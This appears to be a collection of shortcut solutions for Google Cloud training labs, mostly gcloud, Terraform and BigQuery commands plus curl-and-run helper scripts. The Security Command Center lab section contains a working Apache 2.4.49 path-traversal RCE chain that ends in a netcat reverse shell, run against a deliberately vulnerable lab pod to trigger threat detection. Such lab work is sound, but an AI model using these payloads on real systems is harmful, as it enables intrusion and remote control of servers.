Fast Track News: March 2024

March || Level 3 || Lab 8 Arcade Hero: Enter the Source Repository

Command ► gcloud source repos create REPO_NAME 

March || Level 3 || Lab 7 Arcade Hero: Enter the Firewall Target Tag

# Lab 7: allow inbound HTTP (tcp:80) from anywhere to instances tagged "staging-vm".
gcloud compute firewall-rules create default-allow-inbound \
  --project=$DEVSHELL_PROJECT_ID \
  --direction=INGRESS \
  --priority=1000 \
  --network=default \
  --action=ALLOW \
  --rules=tcp:80 \
  --source-ranges=0.0.0.0/0 \
  --target-tags=staging-vm

March || Level 3 || Lab 6 Arcade Hero: Enter the Outbound Firewall

# Lab 6: allow outbound HTTP (tcp:80) from instances tagged "staging-vm".
# FIX: an EGRESS rule takes --destination-ranges; gcloud rejects
# --source-ranges when --direction=EGRESS, so the original command errored out.
gcloud compute --project=$DEVSHELL_PROJECT_ID firewall-rules create default-allow-outbound --direction=EGRESS --priority=1000 --network=default --action=ALLOW --rules=tcp:80 --destination-ranges=0.0.0.0/0 --target-tags=staging-vm

March || Level 3 || Lab 5 Arcade Hero: Enter the Inbound Firewall

# Lab 5: permit inbound tcp:80 from any source to VMs carrying the
# "staging-vm" network tag on the default VPC.
gcloud compute firewall-rules create default-allow-inbound \
  --project=$DEVSHELL_PROJECT_ID \
  --direction=INGRESS \
  --priority=1000 \
  --network=default \
  --action=ALLOW \
  --rules=tcp:80 \
  --source-ranges=0.0.0.0/0 \
  --target-tags=staging-vm

March || Level 3 || Lab 4 Arcade Hero: Enter the PubSub Subscription

# Lab 4: fetch and run the PubSub-subscription helper script.
# FIX: give curl an explicit https:// scheme — a schemeless URL is fetched
# over plain http first and only reaches https via a redirect.
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Arcade%20Hero/quicklabarc124.sh

chmod +x quicklabarc124.sh   # sudo unnecessary: we own the downloaded file

./quicklabarc124.sh

March || Level 3 || Lab 3 Arcade Hero: Enter the BigQuery Table

# Lab 3: fetch and run the BigQuery-table helper script.
# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Arcade%20Hero/quicklabarc130.sh

chmod +x quicklabarc130.sh   # sudo unnecessary: we own the downloaded file

./quicklabarc130.sh

March || Level 3 || Lab 2 Arcade Hero: Enter the Subnet

# Lab 2: set the region shown in your lab panel before running the script.
export REGION=   # e.g. export REGION=us-central1

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Arcade%20Hero/quicklabarc127.sh

chmod +x quicklabarc127.sh

./quicklabarc127.sh

March || Level 3 || Lab 1 Arcade Hero: Enter the BigQuery

# Lab 1: create a US multi-region BigQuery dataset in the lab project.
# Replace DATASET_NAME with the dataset name given in the lab instructions.
 bq --location=US mk --dataset $DEVSHELL_PROJECT_ID:DATASET_NAME

March || Level 2 || Lab 12 Configuring IAM Permissions with gcloud

# Lab 12: fill these two values from the lab panel before running the script.
export SECOND_USER_NAME=

export SECOND_PROJECT_ID=

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Configuring%20IAM%20Permissions%20with%20gcloud%20updated/quicklabgsp647.sh

chmod +x quicklabgsp647.sh

./quicklabgsp647.sh

March || Level 2 || Lab 11 Create a Cosmetic Anomaly Detection Model using Visual Inspection AI

# Lab 11: stage the cosmetic-inspection demo images and their CSV manifest.
gcloud auth list

gcloud config list project

export PROJECT_ID=$(gcloud config get-value core/project)

gsutil mb gs://${PROJECT_ID}

# FIX: source and destination must be one command — the original had a blank
# line after the trailing backslash, which broke the continuation and left
# "gs://${PROJECT_ID}/cosmetic-test-data/" dangling as a separate command.
# Quote the wildcard so gsutil (not the local shell) expands it.
gsutil -m cp "gs://cloud-training/gsp897/cosmetic-test-data/*.png" \
  "gs://${PROJECT_ID}/cosmetic-test-data/"

gsutil ls "gs://${PROJECT_ID}/cosmetic-test-data/*.png" > /tmp/demo_cosmetic_images.csv

gsutil cp /tmp/demo_cosmetic_images.csv gs://${PROJECT_ID}/demo_cosmetic_images.csv


March || Level 2 || Lab 10 Video Intelligence: Qwik Start

# Lab 10: fetch and run the Video Intelligence helper script.
# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Video%20Intelligence%20Qwik%20Start/quicklabgsp154.sh

chmod +x quicklabgsp154.sh

./quicklabgsp154.sh

March || Level 2 || Lab 9 Interact with Terraform Modules

 export PROJECT_ID=$(gcloud config get-value project)

git clone https://github.com/terraform-google-modules/terraform-google-network

cd terraform-google-network

git checkout tags/v6.0.1 -b v6.0.1

# Write the example's main.tf: consume the network module (~> 6.0) and define
# three us-west1 subnets with progressively richer flow-log configuration.
echo 'module "test-vpc-module" {

  source       = "terraform-google-modules/network/google"

  version      = "~> 6.0"

  project_id   = var.project_id

  network_name = var.network_name

  mtu          = 1460


  subnets = [

    {

      subnet_name   = "subnet-01"

      subnet_ip     = "10.10.10.0/24"

      subnet_region = "us-west1"

    },

    {

      subnet_name           = "subnet-02"

      subnet_ip             = "10.10.20.0/24"

      subnet_region         = "us-west1"

      subnet_private_access = "true"

      subnet_flow_logs      = "true"

    },

    {

      subnet_name               = "subnet-03"

      subnet_ip                 = "10.10.30.0/24"

      subnet_region             = "us-west1"

      subnet_flow_logs          = "true"

      subnet_flow_logs_interval = "INTERVAL_10_MIN"

      subnet_flow_logs_sampling = 0.7

      subnet_flow_logs_metadata = "INCLUDE_ALL_METADATA"

      subnet_flow_logs_filter   = "false"

    }

  ]

}' > examples/simple_project/main.tf


# Write variables.tf with the current project ID baked in as the default.
echo 'variable "project_id" {

  description = "The project ID to host the network in Cloudhustler"

  default     = "'"$PROJECT_ID"'"

}

variable "network_name" {

  description = "The name of the VPC network being created Hustler"

  default     = "cloudhustlers"

}' > examples/simple_project/variables.tf

# Apply and tear down the example, then stage the static-website files.
cd ~/terraform-google-network/examples/simple_project

terraform init

terraform apply -auto-approve

terraform destroy -auto-approve

# FIX: return home BEFORE deleting the clone — the original ran `rm` while
# still inside examples/simple_project, where ./terraform-google-network
# does not exist, so the clone was never removed.
cd ~

rm -rf -- terraform-google-network

gsutil mb gs://$PROJECT_ID

curl https://raw.githubusercontent.com/hashicorp/learn-terraform-modules/master/modules/aws-s3-static-website-bucket/www/index.html > index.html

# FIX: raw.githubusercontent.com URLs never contain "/blob/"; the original
# error.html URL 404'd and saved the 404 page instead of the real file.
curl https://raw.githubusercontent.com/hashicorp/learn-terraform-modules/master/modules/aws-s3-static-website-bucket/www/error.html > error.html

gsutil cp *.html gs://$PROJECT_ID

March || Level 2 || Lab 8 Infrastructure as Code with Terraform

 export PROJECT_ID=$(gcloud config get-value project)

echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}' > main.tf

terraform init

terraform apply -auto-approve

# Lab 8, step 2: rewrite main.tf adding a Debian 11 VM on the VPC, then apply.
echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  boot_disk {

    initialize_params {

      image = "debian-cloud/debian-11"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}' > main.tf

terraform apply -auto-approve

# Lab 8, step 3: same configuration plus network tags on the VM (an in-place
# update), then apply.
echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

  boot_disk {

    initialize_params {

      image = "debian-cloud/debian-11"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}' > main.tf

terraform apply -auto-approve

# Lab 8, step 4: change the boot image to Container-Optimized OS (a
# destructive change — boot_disk forces replacement), apply, then do a full
# destroy/re-apply cycle.
echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}' > main.tf

terraform apply -auto-approve

terraform destroy -auto-approve

terraform apply -auto-approve

# Lab 8, step 5: add a static external IP resource (not yet attached) and
# preview the change with plan only.
echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.name

    access_config {

    }

  }

}

resource "google_compute_address" "vm_static_ip" {

  name = "terraform-static-ip"

}' > main.tf

terraform plan

# Lab 8, step 6: attach the static IP to the VM via access_config.nat_ip,
# save the plan to a file, and apply exactly that saved plan.
echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

    network_interface {

    network = google_compute_network.vpc_network.self_link

    access_config {

      nat_ip = google_compute_address.vm_static_ip.address

    }

  }

}

resource "google_compute_address" "vm_static_ip" {

  name = "terraform-static-ip"

}' > main.tf

terraform plan -out static_ip

terraform apply "static_ip"

# Lab 8, step 7: add a website bucket named after the project and a second VM
# that explicitly depends_on the bucket; plan, then apply.
echo 'terraform {

  required_providers {

    google = {

      source = "hashicorp/google"

    }

  }

}

provider "google" {

  version = "3.5.0"

  project = "'"$PROJECT_ID"'"

  region  = "us-central1"

  zone    = "us-central1-c"

}

resource "google_compute_network" "vpc_network" {

  name = "terraform-network"

}

resource "google_compute_instance" "vm_instance" {

  name         = "terraform-instance"

  machine_type = "e2-micro"

  tags        = ["web", "dev"]

      boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

    network_interface {

    network = google_compute_network.vpc_network.self_link

    access_config {

      nat_ip = google_compute_address.vm_static_ip.address

    }

  }

}

resource "google_compute_address" "vm_static_ip" {

  name = "terraform-static-ip"

}

# New resource for the storage bucket our application will use.

resource "google_storage_bucket" "example_bucket" {

  name     = "'"$PROJECT_ID"'"

  location = "US"

  website {

    main_page_suffix = "index.html"

    not_found_page   = "404.html"

  }

}

# Create a new instance that uses the bucket

resource "google_compute_instance" "another_instance" {

  depends_on = [google_storage_bucket.example_bucket]

  name         = "terraform-instance-2"

  machine_type = "e2-micro"

  boot_disk {

    initialize_params {

      image = "cos-cloud/cos-stable"

    }

  }

  network_interface {

    network = google_compute_network.vpc_network.self_link

    access_config {

    }

  }

}' > main.tf

terraform plan

terraform apply -auto-approve

March || Level 2 || Lab 7 Terraform Fundamentals

# Lab 7: set the zone shown in your lab panel before running the script.
export ZONE=   # e.g. export ZONE=us-central1-c

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Terraform%20Fundamentals/quicklabgsp156.sh

chmod +x quicklabgsp156.sh

./quicklabgsp156.sh

March || Level 2 || Lab 6 Exploring NCAA Data with BigQuery

 Query 1


#standardSQL

#count of play-by-play events by type, most frequent first

SELECT

  event_type,

  COUNT(*) AS event_count

FROM `bigquery-public-data.ncaa_basketball.mbb_pbp_sr`

GROUP BY 1

ORDER BY event_count DESC;


 Query 2


#standardSQL

#most three points made

#top 5 games since the 2011 season by combined threes from both teams

SELECT

  scheduled_date,

  name,

  market,

  alias,

  three_points_att,

  three_points_made,

  three_points_pct,

  opp_name,

  opp_market,

  opp_alias,

  opp_three_points_att,

  opp_three_points_made,

  opp_three_points_pct,

  (three_points_made + opp_three_points_made) AS total_threes

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

WHERE season > 2010

ORDER BY total_threes DESC

LIMIT 5;


 Query 3


#standardSQL

#five largest venues by seating capacity

SELECT

  venue_name, venue_capacity, venue_city, venue_state

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

GROUP BY 1,2,3,4

ORDER BY venue_capacity DESC

LIMIT 5;


 Query 4


#standardSQL

#highest scoring game of all time

#(restricted to seasons after 2010; combined points of both teams)

SELECT

  scheduled_date,

  name,

  market,

  alias,

  points_game AS team_points,

  opp_name,

  opp_market,

  opp_alias,

  opp_points_game AS opposing_team_points,

  points_game + opp_points_game AS point_total

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

WHERE season > 2010

ORDER BY point_total DESC

LIMIT 5;


 Query 5

#standardSQL

#biggest point difference in a championship game

#(seasons after 2015; ABS() so the margin is positive either way)

SELECT

  scheduled_date,

  name,

  market,

  alias,

  points_game AS team_points,

  opp_name,

  opp_market,

  opp_alias,

  opp_points_game AS opposing_team_points,

  ABS(points_game - opp_points_game) AS point_difference

FROM `bigquery-public-data.ncaa_basketball.mbb_teams_games_sr`

WHERE season > 2015 AND tournament_type = 'National Championship'

ORDER BY point_difference DESC

LIMIT 5;



March || Level 2 || Lab 5 Managing Deployments Using Kubernetes Engine

# Lab 5: set the zone shown in your lab panel before running the script.
export ZONE=   # e.g. export ZONE=us-central1-a

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/QUICK-GCP-LAB/2-Minutes-Labs-Solutions/main/Managing%20Deployments%20Using%20Kubernetes%20Engine/gsp053.sh

chmod +x gsp053.sh

./gsp053.sh

March || Level 2 || Lab 4 Managing Terraform State

# Lab 4: set the region shown in your lab panel before running the script.
export REGION=   # e.g. export REGION=us-central1

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Managing%20Terraform%20State/quicklabgsp752.sh

chmod +x quicklabgsp752.sh

./quicklabgsp752.sh

March || Level 2 || Lab 3 Introduction to SQL for BigQuery and CloudSQL

# Lab 3: set the region shown in your lab panel before running the script.
export REGION=   # e.g. export REGION=us-central1

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/Techcps/GSP-Short-Trick/master/Introduction%20to%20SQL%20for%20BigQuery%20and%20Cloud%20SQL/techcpsgsp281.sh

chmod +x techcpsgsp281.sh

./techcpsgsp281.sh

March || Level 2 || Lab 2 Compute Engine: Qwik Start - Windows

# Lab 2: set the zone shown in your lab panel before running the script.
export ZONE=   # e.g. export ZONE=us-central1-a

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/quiccklabs/Labs_solutions/master/Compute%20Engine%20Qwik%20Start%20Windows/quicklabgsp093.sh

chmod +x quicklabgsp093.sh

./quicklabgsp093.sh

March || Level 2 || Lab 1 Deploy, Scale, and Update Your Website on Google Kubernetes Engine

# Lab 1: set the zone shown in your lab panel before running the script.
export ZONE=   # e.g. export ZONE=us-central1-a

# FIX: explicit https:// scheme (schemeless curl URLs start over plain http).
curl -LO https://raw.githubusercontent.com/Techcps/GSP-Short-Trick/master/Deploy%2C%20Scale%2C%20and%20Update%20Your%20Website%20on%20Google%20Kubernetes%20Engine/techcpsgsp663.sh

chmod +x techcpsgsp663.sh

./techcpsgsp663.sh


March Skill Surge || Lab 8 || Consuming Customer Specific Datasets from Data Sharing Partners using BigQuery

 

GSP1043

Run in cloudshell

# Create demo_dataset.authorized_table: for each state, the ten ZIP-code
# areas with the largest land area, from the public US boundaries dataset.
bq query \
--use_legacy_sql=false \
--destination_table=$DEVSHELL_PROJECT_ID:demo_dataset.authorized_table \
'SELECT * FROM (
SELECT *, ROW_NUMBER() OVER (PARTITION BY state_code ORDER BY area_land_meters DESC) AS cities_by_area
FROM `bigquery-public-data.geo_us_boundaries.zip_codes`) cities
WHERE cities_by_area <= 10 ORDER BY cities.state_code
LIMIT 1000;'

Bigquery > demo_dataset

Sharing > Authorize datasets > type and select demo_dataset > Add Authorization >close

authorized_table > Share

Add Principal > Paste username 1 and 2 from lab > Role BigQuery Data Viewer > save

Close the incognito window

Login to Publisher Console

For the project ID, copy it from Task 1, step 6 (the project ID only).

# Publisher project: paste project ID 1 (from Task 1, step 6), then create an
# authorized view over the shared table restricted to New York rows.
# The final echo prints this project's ID so it can be saved as project ID 2.
PROJECT_ID_1=
bq mk --use_legacy_sql=false --view 'SELECT *
FROM `'$PROJECT_ID_1'.demo_dataset.authorized_table`
WHERE state_code="NY"
LIMIT 1000' data_publisher_dataset.authorized_view
echo "PROJECT_ID_2=$DEVSHELL_PROJECT_ID"

Copy the project id 2 (From last line in terminal) and Store it

Bigquery > data_publisher_dataset

Sharing > Authorize Views > type and select data_publisher_dataset > Add Authorization >close

authorized_view > Share

Add Principal > Paste username 2 from lab > Role BigQuery Data Viewer > save

Close the incognito window

Login to Customer (Data Twin) Console

# Customer (data twin) project: paste project ID 2 saved earlier, then join
# the publisher's authorized view against the local customer table.
PROJECT_ID_2=
# FIX: the original interpolated $DEVSHELL_PROJETC_ID (typo), which expanded
# to an empty string and produced an invalid table reference in the view SQL.
bq mk --use_legacy_sql=false --view 'SELECT cities.zip_code, cities.city, cities.state_code, customers.last_name, customers.first_name
FROM `'$DEVSHELL_PROJECT_ID'.customer_dataset.customer_info` as customers
JOIN `'$PROJECT_ID_2'.data_publisher_dataset.authorized_view` as cities
ON cities.state_code = customers.state;' customer_dataset.customer_table

March Skill Surge || Lab 7 || Detect and Investigate Threats with Security Command Center

 

GSP1125

Run in cloudshell

IAM & ADMIN > Audit Logs > Cloud Resource Manager API > Admin Read > Save

# Set the lab zone; the region is the zone minus its trailing "-X" suffix
# (e.g. us-central1-c -> us-central1), hence stripping the last 2 characters.
export ZONE=
REGION=${ZONE::-2}
# Grant and immediately revoke bigquery.admin to generate IAM audit findings.
gcloud projects add-iam-policy-binding $DEVSHELL_PROJECT_ID \
--member=user:demouser1@gmail.com --role=roles/bigquery.admin
gcloud projects remove-iam-policy-binding $DEVSHELL_PROJECT_ID \
--member=user:demouser1@gmail.com --role=roles/bigquery.admin
gcloud services enable securitycenter.googleapis.com --project=$DEVSHELL_PROJECT_ID
sleep 20
# NOTE(review): assumes $USER_EMAIL is already exported by the lab shell.
gcloud projects add-iam-policy-binding $DEVSHELL_PROJECT_ID \
  --member=user:$USER_EMAIL \
  --role=roles/cloudresourcemanager.projectIamAdmin 2>/dev/null
gcloud compute instances create instance-1 \
--zone=$ZONE \
--machine-type=e2-medium \
--network-interface=network-tier=PREMIUM,stack-type=IPV4_ONLY,subnet=default \
--metadata=enable-oslogin=true --maintenance-policy=MIGRATE --provisioning-model=STANDARD \
--scopes=https://www.googleapis.com/auth/cloud-platform --create-disk=auto-delete=yes,boot=yes,device-name=instance-1,image=projects/debian-cloud/global/images/debian-11-bullseye-v20230912,mode=rw,size=10,type=projects/$DEVSHELL_PROJECT_ID/zones/$ZONE/diskTypes/pd-balanced
# DNS policy with logging enabled, then SSH in and hit the Event Threat
# Detection malware-test domain to generate a finding.
gcloud dns --project=$DEVSHELL_PROJECT_ID policies create dns-test-policy --description="cloudhustler" --networks="default" --private-alternative-name-servers="" --no-enable-inbound-forwarding --enable-logging
sleep 30
gcloud compute ssh instance-1 --zone=$ZONE --tunnel-through-iap --project "$DEVSHELL_PROJECT_ID" --quiet --command "gcloud projects get-iam-policy \$(gcloud config get project) && curl etd-malware-trigger.goog"

Verify your progress through Task 2, then proceed.

# Create the (internal-only) attacker VM, remove the first instance, and turn
# on Private Google Access so the address-less VM can reach Google APIs.
gcloud compute instances create attacker-instance \
--scopes=cloud-platform  \
--zone=$ZONE \
--machine-type=e2-medium  \
--image-family=ubuntu-2004-lts \
--image-project=ubuntu-os-cloud \
--no-address
gcloud compute instances delete instance-1 --zone=$ZONE --quiet
gcloud compute networks subnets update default \
--region=$REGION \
--enable-private-ip-google-access
sleep 30
gcloud compute ssh --zone "$ZONE" "attacker-instance" --quiet

image

IP is in TASK 5, STEP 5 (NOTE)

# Inside the attacker VM: paste the IP from Task 5 step 5 and the zone, then
# replace the snap-packaged gcloud with the tarball SDK release.
TASK_5_IP=
export ZONE=
sudo snap remove google-cloud-cli
curl -O https://dl.google.com/dl/cloudsdk/channels/rapid/downloads/google-cloud-cli-438.0.0-linux-x86_64.tar.gz
tar -xf google-cloud-cli-438.0.0-linux-x86_64.tar.gz
./google-cloud-sdk/install.sh

Press N > Press y

# Reload the shell env so the new SDK is on PATH, then create a fully private
# GKE cluster whose control plane only accepts the Task 5 IP.
. ~/.bashrc
gcloud components install kubectl gke-gcloud-auth-plugin --quiet
gcloud container clusters create test-cluster \
--zone "$ZONE" \
--enable-private-nodes \
--enable-private-endpoint \
--enable-ip-alias \
--num-nodes=1 \
--master-ipv4-cidr "172.16.0.0/28" \
--enable-master-authorized-networks \
--master-authorized-networks "$TASK_5_IP"
sleep 30
# Poll the container-watcher daemonset until its description mentions the
# unique ID, waiting 10s between attempts; print the description once found.
watcher_desc=$(kubectl describe daemonsets container-watcher -n kube-system)
while [[ $watcher_desc != *container-watcher-unique-id* ]]; do
    echo "SUBSCRIBE CLOUDHUSTLERS AND Comment on Video / Wait for sometime"
    sleep 10
    watcher_desc=$(kubectl describe daemonsets container-watcher -n kube-system)
done
echo "Found unique ID in the output:"
echo "$watcher_desc"
# Deploy a deliberately vulnerable Apache 2.4.49 image and expose it via a
# NodePort service for the exploit demo.
kubectl create deployment apache-deployment \
--replicas=1 \
--image=us-central1-docker.pkg.dev/cloud-training-prod-bucket/scc-labs/ktd-test-httpd:2.4.49-vulnerable
kubectl expose deployment apache-deployment \
--name apache-test-service  \
--type NodePort \
--protocol TCP \
--port 80
NODE_IP=$(kubectl get nodes -o jsonpath={.items[0].status.addresses[0].address})
NODE_PORT=$(kubectl get service apache-test-service \
-o jsonpath={.spec.ports[0].nodePort})
# Open the NodePort plus 8888 for the reverse-connect channel used later.
gcloud compute firewall-rules create apache-test-service-fw \
--allow tcp:${NODE_PORT}
gcloud compute firewall-rules create apache-test-rvrs-cnnct-fw --allow tcp:8888
# Path-traversal RCE probes against the vulnerable CGI handler
# (%2e%2e escapes the cgi-bin directory to reach /bin/sh).
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; id"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; ls -l /"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; hostname"
# Stage a netcat binary and serve it over HTTP from this VM on port 8888.
gsutil cp \
gs://cloud-training/gsp1125/netcat-traditional_1.10-41.1_amd64.deb .
mkdir netcat-traditional
dpkg --extract netcat-traditional_1.10-41.1_amd64.deb netcat-traditional
LOCAL_IP=$(ip -4 addr show ens4 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo ${LOCAL_IP}
python3 -m http.server --bind ${LOCAL_IP} \
--directory ~/netcat-traditional/bin/ 8888 &

Press Enter

# Re-run the RCE probes and netcat staging (the detector needs repeated hits).
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; id"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; ls -l /"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; hostname"
gsutil cp \
gs://cloud-training/gsp1125/netcat-traditional_1.10-41.1_amd64.deb .
# FIX: -p so this repeated pass doesn't abort — the directory already exists
# from the first staging run above.
mkdir -p netcat-traditional
dpkg --extract netcat-traditional_1.10-41.1_amd64.deb netcat-traditional
LOCAL_IP=$(ip -4 addr show ens4 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo ${LOCAL_IP}
python3 -m http.server --bind ${LOCAL_IP} \
--directory ~/netcat-traditional/bin/ 8888 &

Press Enter

# Verify the local file server answers, then use the RCE to pull the netcat
# binary onto the pod at /tmp/nc, make it executable, and test-run it.
curl http://${LOCAL_IP}:8888
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" --path-as-is --insecure --data "echo Content-Type: text/plain; echo; curl http://${LOCAL_IP}:8888/nc.traditional -o /tmp/nc"
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; chmod +x /tmp/nc"
# Stop the throwaway HTTP server once the binary has been delivered.
pkill python
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" \
--path-as-is \
--insecure \
--data "echo Content-Type: text/plain; echo; /tmp/nc"

Open new terminal

# Second terminal: SSH to the attacker VM and listen for the reverse shell
# on port 8888.
export ZONE=us-central1-c
gcloud compute ssh --zone "$ZONE" "attacker-instance" --quiet --command "nc -nlvp 8888"

In first terminal

# First terminal: trigger the reverse shell from the pod back to the listener.
curl "http://${NODE_IP}:${NODE_PORT}/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" --path-as-is --insecure --data "echo Content-Type: text/plain; echo; /tmp/nc ${LOCAL_IP} 8888 -e /bin/bash"

April Week 2 || Lab 2 || Troubleshooting Data Models in Looker

  CREATE NEW FILE NAME: user_order_lifetime view: user_order_lifetime { derived_table: { sql: SELECT order_items.user_id as us...